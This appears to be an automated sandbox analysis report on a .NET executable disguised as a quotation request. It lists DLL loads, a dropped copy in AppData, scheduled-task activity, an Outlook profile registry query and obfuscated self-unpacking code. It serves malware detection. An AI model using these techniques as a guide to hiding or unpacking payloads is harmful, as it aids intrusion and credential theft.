Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.54c0000.3.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.cs	.Net Code: mM6bsrFDxr System.Reflection.Assembly.Load(byte[])
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.cs	.Net Code: mM6bsrFDxr System.Reflection.Assembly.Load(byte[])
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.cs	.Net Code: mM6bsrFDxr System.Reflection.Assembly.Load(byte[])

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: 0x8DC155A3 [Sat May 13 03:10:27 2045 UTC]

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C8909 push es; ret	9_2_065C8920
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_0153F288 pushfd ; iretd	10_2_0153F291
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_0569C688 push eax; retf	10_2_0569C68D
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC890D push es; ret	14_2_06DC8920

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Static PE information: section name: .text entropy: 7.761882583486439
Source: nDEusQ.exe.1.dr	Static PE information: section name: .text entropy: 7.761882583486439

Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, x3T9Ytw1Zeo1bprUX1.cs	High entropy of concatenated method names: 'RmspEnaafS', 'u2gpjuOXwa', 'UpgpA6eQK1', 'LhAA0jkn0h', 'Pu5AzF54bE', 'vAepLVqdqw', 'II7pMVGHM3', 'wDApY4eabA', 'fmppuKiawY', 'LEqpbofcad'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, THX12LMbpUTAhaBFVoE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ds1HXU5brq', 'Q6THfENk30', 'bojHOJ4lxP', 'nQCHHNpZjc', 'T62HDYp5AA', 'oRYH3lEb4S', 'YbfHTGiEZv'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, WI4re4rlxdWBEC7k2o.cs	High entropy of concatenated method names: 'tnVA6wSEGv', 'J4AAJYZ9oi', 'LKAAl5qv9w', 'DlhApuveV9', 'cjTAt1DMx5', 'fB8lCwd4c2', 'Oe9lW2mx2d', 'jPJlgnG2jd', 'XwEl1XUDkV', 'Xm3lIgqmid'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, hKbC3fIwQJBD85kemO.cs	High entropy of concatenated method names: 'VmaXr4fPMa', 'A8IXh2aMeG', 'rXCX5EHtyh', 'zUAXdgCOjm', 'scBXQ9J23a', 'pL4XUgiTph', 'KMwXw6HVbq', 'oFrXxGMKh6', 'I6lX7xZBLl', 'lRUXP35JOM'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, WRp4DPbfMDTyk1O1Po.cs	High entropy of concatenated method names: 'rCJMpkQPIS', 'WjIMtfgwhQ', 'uCQMqlONxW', 'QLsMGvQYSC', 'vdfMvNmgI4', 'Ge4MZlxdWB', 'VxAH6WkD1hgGm2tLwP', 'vPMfZ2ZkkxSr2bXsA3', 'mESMMMGwIa', 'MAGMunlXh1'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, fkQPIScgjIfgwhQwC4.cs	High entropy of concatenated method names: 'InjJmQpfDL', 'd1QJyWnffc', 'CtdJFJTxa5', 'ddgJkmGZce', 'EehJCr1xSL', 'NKvJWUmgGJ', 'WwwJgmw8lZ', 'wriJ1AiDj5', 'jrUJIZjNy0', 'sjaJ0KMWcH'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, dAK0Jo7pGEwxjjvoZ9.cs	High entropy of concatenated method names: 'KGPp8igC05', 'uP9pVoucy9', 'n97ps73p8y', 'BjLpn6A7MZ', 'hoEp2nwJ4n', 'tHMpKihQTt', 'Wv8p9jhHqE', 'B73pc58qHb', 'feQpNqE0bI', 'lwtpRnQWmn'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, uHYtq8JGWgdmDkrnFe.cs	High entropy of concatenated method names: 'Dispose', 'MvoMI9PEDs', 'TC5YhurOt7', 'kOqHKpLdsS', 'U62M0w4T6o', 'lNgMzsP2rM', 'ProcessDialogKey', 'pEjYLKbC3f', 'LQJYMBD85k', 'kmOYY3enPD'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, U89jwOmf6bjtiChj87.cs	High entropy of concatenated method names: 'xWdvPe8pGa', 'wqhvB3ijYe', 'QRPvmWgukT', 'D7svyfy7IY', 'EMrvhlAthy', 'CJJv5kGeJd', 'WXnvdaJXeo', 'hAyvQJPFKK', 'DVmvURY217', 'jytvwpvPqU'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, JYSCnPRc3nAZm3dfNm.cs	High entropy of concatenated method names: 'Pyol20s7W6', 'mA3l9sD9Ck', 'hDcj5kOJFG', 'EBsjdpF1q4', 'QVIjQT5IbC', 'NpFjUlEqO3', 'o1Bjw3KxRo', 'JMSjxVnin9', 'wP6j7j8buK', 'rq0jP6iTd7'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, EaKXsxMMEduJxGG4xjT.cs	High entropy of concatenated method names: 'miKf0wUfkk', 'Hn0fzkQwjH', 'yoqOLi8T1V', 'eb1OMcHqn6', 'nolOYCfn8D', 'C8ROuOxVeu', 'ildObF2eJg', 'f2kO63Dshp', 'NTAOEMvRhG', 'tj7OJXA6sC'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, DjPSAiMLZHPXieDTNDF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ka2foocHSM', 'MYvfBEU5UY', 'i1wf4HDXfS', 'mL6fm8Ckr2', 'OZNfyJDkNx', 'iMRfFZqOqm', 'AxTfkGAhbn'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, GSBw9m4TudYHHyonnQ.cs	High entropy of concatenated method names: 'K1dScNvaZG', 'zoeSNXwywR', 'lbXSryrlqg', 'x1vShLGi4l', 'gWTSdgh0iq', 'bkhSQamrRc', 'FMtSwaYHq5', 'HjASxJ1u4S', 'yipSPEseR8', 'HZJSod7A3b'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, oQwkqegZB7vo9PEDsC.cs	High entropy of concatenated method names: 'RcOXvqMnX4', 'U6cXa48dT5', 'xfyXXrZGVN', 'hBlXOP16TJ', 'p4gXDQIvy7', 'oQ3XTa1HKk', 'Dispose', 'enliE5niuB', 'U8qiJfSWec', 'DPxijSktNu'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, sKaGDFhd7daKD2HCDM.cs	High entropy of concatenated method names: 'JQJVuYoeFhMwySvlT1g', 'Sj9ELUo2WPOAiYSiX1f', 'twvAi8lZZE', 'IHLAXItvT5', 'GJHAfT4Y9A', 'A10KeuoAtms8ixlp7Ct', 'BuE8rbonhCYeyRpqidW'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, pStGwHWAhZDI9vOfIH.cs	High entropy of concatenated method names: 'kWka1OPE1q', 'suga0eQOUe', 'LvViLxThG6', 'YQIiM6blDZ', 'QEhaotNRXE', 'q6kaB4GV6H', 'M8va4Ox3t7', 'EENamF3ufu', 's29ayALexb', 'HJbaFDrctS'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, wenPDN0lV2brx5PPTj.cs	High entropy of concatenated method names: 'efKfjTmFr3', 'pF3flaBE41', 'G00fARe2TL', 'wF7fp3Usdg', 'l25fXrV2Ns', 'QPGft9Z9XC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, CbSV3bzym8O87TbSJt.cs	High entropy of concatenated method names: 'P7AfKVt4HX', 'MyyfccLB1j', 'lcRfNJoiIr', 'DfYfrUVS9s', 'FJmfhmGkX8', 'DYkfdZ8jlU', 'TSJfQL6HpL', 'NllfT1embw', 'dcKf8mxjcu', 'L0dfVnwEfq'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.cs	High entropy of concatenated method names: 'DMwu6TRik5', 'NhSuEjTsaG', 'dmZuJ8vPmG', 'SdrujgMWhH', 'tRUuldYXAF', 'YNfuA1Kq3t', 'EWuuphbenQ', 'qqcuts3nbt', 'hP7ue5DhFF', 'up9uqpOyi9'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, KG4olSYldb1sA0V8RF.cs	High entropy of concatenated method names: 'IxosJTktd', 'uwNn5QbU1', 'ndSK9jhwL', 'xOd9HdXsM', 'lgkNcn3O9', 'nTbRnTXus', 'PJcUlQ34R9v6OwRm9F', 'd3YQJkKCFxSkjsUI46', 'RwHiJWFxZ', 'olfffixYq'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, IXLn1HNCQlONxWmLsv.cs	High entropy of concatenated method names: 'zLQjn72Bbl', 'vYSjKZVpb8', 'Br8jcBrLOL', 'OQajNds1B8', 'N5Qjvj0OCX', 'YExjZU6yys', 'dCYjajOvgJ', 'NkNjisibkK', 'nUEjX0qh44', 'B2DjfUOaO5'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, d91LhKkasGagSZPIlt.cs	High entropy of concatenated method names: 'KCfaqi7vcG', 'u53aGu4Twl', 'ToString', 'gvFaEodvQu', 'nTvaJQHycH', 'm0bajJCRTG', 'Tt2alqAZUF', 'C8SaA7GAXG', 'aOHap9VP7i', 'KCLatPVYCh'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, x3T9Ytw1Zeo1bprUX1.cs	High entropy of concatenated method names: 'RmspEnaafS', 'u2gpjuOXwa', 'UpgpA6eQK1', 'LhAA0jkn0h', 'Pu5AzF54bE', 'vAepLVqdqw', 'II7pMVGHM3', 'wDApY4eabA', 'fmppuKiawY', 'LEqpbofcad'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, THX12LMbpUTAhaBFVoE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ds1HXU5brq', 'Q6THfENk30', 'bojHOJ4lxP', 'nQCHHNpZjc', 'T62HDYp5AA', 'oRYH3lEb4S', 'YbfHTGiEZv'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, WI4re4rlxdWBEC7k2o.cs	High entropy of concatenated method names: 'tnVA6wSEGv', 'J4AAJYZ9oi', 'LKAAl5qv9w', 'DlhApuveV9', 'cjTAt1DMx5', 'fB8lCwd4c2', 'Oe9lW2mx2d', 'jPJlgnG2jd', 'XwEl1XUDkV', 'Xm3lIgqmid'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, hKbC3fIwQJBD85kemO.cs	High entropy of concatenated method names: 'VmaXr4fPMa', 'A8IXh2aMeG', 'rXCX5EHtyh', 'zUAXdgCOjm', 'scBXQ9J23a', 'pL4XUgiTph', 'KMwXw6HVbq', 'oFrXxGMKh6', 'I6lX7xZBLl', 'lRUXP35JOM'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, WRp4DPbfMDTyk1O1Po.cs	High entropy of concatenated method names: 'rCJMpkQPIS', 'WjIMtfgwhQ', 'uCQMqlONxW', 'QLsMGvQYSC', 'vdfMvNmgI4', 'Ge4MZlxdWB', 'VxAH6WkD1hgGm2tLwP', 'vPMfZ2ZkkxSr2bXsA3', 'mESMMMGwIa', 'MAGMunlXh1'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, fkQPIScgjIfgwhQwC4.cs	High entropy of concatenated method names: 'InjJmQpfDL', 'd1QJyWnffc', 'CtdJFJTxa5', 'ddgJkmGZce', 'EehJCr1xSL', 'NKvJWUmgGJ', 'WwwJgmw8lZ', 'wriJ1AiDj5', 'jrUJIZjNy0', 'sjaJ0KMWcH'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, dAK0Jo7pGEwxjjvoZ9.cs	High entropy of concatenated method names: 'KGPp8igC05', 'uP9pVoucy9', 'n97ps73p8y', 'BjLpn6A7MZ', 'hoEp2nwJ4n', 'tHMpKihQTt', 'Wv8p9jhHqE', 'B73pc58qHb', 'feQpNqE0bI', 'lwtpRnQWmn'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, uHYtq8JGWgdmDkrnFe.cs	High entropy of concatenated method names: 'Dispose', 'MvoMI9PEDs', 'TC5YhurOt7', 'kOqHKpLdsS', 'U62M0w4T6o', 'lNgMzsP2rM', 'ProcessDialogKey', 'pEjYLKbC3f', 'LQJYMBD85k', 'kmOYY3enPD'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, U89jwOmf6bjtiChj87.cs	High entropy of concatenated method names: 'xWdvPe8pGa', 'wqhvB3ijYe', 'QRPvmWgukT', 'D7svyfy7IY', 'EMrvhlAthy', 'CJJv5kGeJd', 'WXnvdaJXeo', 'hAyvQJPFKK', 'DVmvURY217', 'jytvwpvPqU'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, JYSCnPRc3nAZm3dfNm.cs	High entropy of concatenated method names: 'Pyol20s7W6', 'mA3l9sD9Ck', 'hDcj5kOJFG', 'EBsjdpF1q4', 'QVIjQT5IbC', 'NpFjUlEqO3', 'o1Bjw3KxRo', 'JMSjxVnin9', 'wP6j7j8buK', 'rq0jP6iTd7'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, EaKXsxMMEduJxGG4xjT.cs	High entropy of concatenated method names: 'miKf0wUfkk', 'Hn0fzkQwjH', 'yoqOLi8T1V', 'eb1OMcHqn6', 'nolOYCfn8D', 'C8ROuOxVeu', 'ildObF2eJg', 'f2kO63Dshp', 'NTAOEMvRhG', 'tj7OJXA6sC'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, DjPSAiMLZHPXieDTNDF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ka2foocHSM', 'MYvfBEU5UY', 'i1wf4HDXfS', 'mL6fm8Ckr2', 'OZNfyJDkNx', 'iMRfFZqOqm', 'AxTfkGAhbn'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, GSBw9m4TudYHHyonnQ.cs	High entropy of concatenated method names: 'K1dScNvaZG', 'zoeSNXwywR', 'lbXSryrlqg', 'x1vShLGi4l', 'gWTSdgh0iq', 'bkhSQamrRc', 'FMtSwaYHq5', 'HjASxJ1u4S', 'yipSPEseR8', 'HZJSod7A3b'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, oQwkqegZB7vo9PEDsC.cs	High entropy of concatenated method names: 'RcOXvqMnX4', 'U6cXa48dT5', 'xfyXXrZGVN', 'hBlXOP16TJ', 'p4gXDQIvy7', 'oQ3XTa1HKk', 'Dispose', 'enliE5niuB', 'U8qiJfSWec', 'DPxijSktNu'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, sKaGDFhd7daKD2HCDM.cs	High entropy of concatenated method names: 'JQJVuYoeFhMwySvlT1g', 'Sj9ELUo2WPOAiYSiX1f', 'twvAi8lZZE', 'IHLAXItvT5', 'GJHAfT4Y9A', 'A10KeuoAtms8ixlp7Ct', 'BuE8rbonhCYeyRpqidW'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, pStGwHWAhZDI9vOfIH.cs	High entropy of concatenated method names: 'kWka1OPE1q', 'suga0eQOUe', 'LvViLxThG6', 'YQIiM6blDZ', 'QEhaotNRXE', 'q6kaB4GV6H', 'M8va4Ox3t7', 'EENamF3ufu', 's29ayALexb', 'HJbaFDrctS'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, wenPDN0lV2brx5PPTj.cs	High entropy of concatenated method names: 'efKfjTmFr3', 'pF3flaBE41', 'G00fARe2TL', 'wF7fp3Usdg', 'l25fXrV2Ns', 'QPGft9Z9XC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, CbSV3bzym8O87TbSJt.cs	High entropy of concatenated method names: 'P7AfKVt4HX', 'MyyfccLB1j', 'lcRfNJoiIr', 'DfYfrUVS9s', 'FJmfhmGkX8', 'DYkfdZ8jlU', 'TSJfQL6HpL', 'NllfT1embw', 'dcKf8mxjcu', 'L0dfVnwEfq'
